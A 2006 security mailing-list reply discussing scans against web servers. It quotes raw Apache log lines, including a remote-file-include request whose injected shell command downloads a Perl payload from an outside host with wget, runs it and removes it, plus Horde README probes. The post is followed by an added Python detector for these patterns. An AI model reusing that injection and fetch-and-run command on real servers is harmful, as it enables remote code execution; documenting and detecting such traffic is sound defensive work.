On Sat, 13 May 2006, Daniel Cid wrote:

> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
We are seeing horde attempts here.

222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET //README HTTP/1.1" 403 791
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde2//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde3//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /Horde//README HTTP/1.1" 404 806

Interestingly, putting a zero length file (link to /dev/zero here) "/a1b2c3d4e5f6g7h8i9/nonexistentfile.php" seems to stop them dead... Gotta wonder about the error checking in the 'sploit ;)

--
Karl Schlitt
[EMAIL PROTECTED]
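A small detector for the two probe patterns discussed in this thread (the mosConfig_absolute_path remote-include attempt and the Horde README version fingerprinting), run over constructed Apache log lines. This is an added example, not code from either poster; the regexes, the sanitized sample hosts and the threshold for flagging an enumerating client are assumptions.

```python
import re
from collections import Counter, defaultdict

# Apache common/combined log line parser (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Mambo/Joomla-style remote include: the config path parameter pointing at a URL.
RFI_RE = re.compile(r'mosConfig_absolute_path=https?://', re.I)
# Horde README probes: //README, /horde*/README, /Horde//README (case-insensitive).
README_RE = re.compile(r'^/+(?:horde[^/]*/+)?README$', re.I)

# Constructed sample log lines (RFC 5737 addresses, .invalid hostnames).
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://shell.example.invalid/cmd.txt? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
198.51.100.7 - - [13/May/2006:13:28:21 -0500] "GET //README HTTP/1.1" 403 791
198.51.100.7 - - [13/May/2006:13:28:22 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
198.51.100.7 - - [13/May/2006:13:28:22 -0500] "GET /Horde//README HTTP/1.1" 404 806
203.0.113.5 - - [13/May/2006:14:00:00 -0500] "GET /index.php?option=com_content HTTP/1.1" 200 5120
""".splitlines()


def classify(line):
    """Return a hit dict for a probe line, or None for normal/unparseable traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group('path')
    if RFI_RE.search(path):
        kind = 'rfi_probe'
    elif README_RE.match(path):
        kind = 'horde_readme_probe'
    else:
        return None
    return {'ip': m.group('ip'), 'kind': kind, 'path': path,
            'status': int(m.group('status'))}


def summarize(lines, enum_threshold=3):
    """Collect hits, count them per (ip, kind) and flag clients that walk
    several distinct README locations (version enumeration, as in the thread)."""
    hits = [h for h in map(classify, lines) if h]
    per_ip = Counter((h['ip'], h['kind']) for h in hits)
    readme_paths = defaultdict(set)
    for h in hits:
        if h['kind'] == 'horde_readme_probe':
            readme_paths[h['ip']].add(h['path'].lower())
    enumerators = sorted(ip for ip, p in readme_paths.items() if len(p) >= enum_threshold)
    return hits, per_ip, enumerators
```

Note that both probe kinds are flagged regardless of status code: a 404 still tells you who is scanning, and the 403 on `//README` shows the document root itself being tried.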
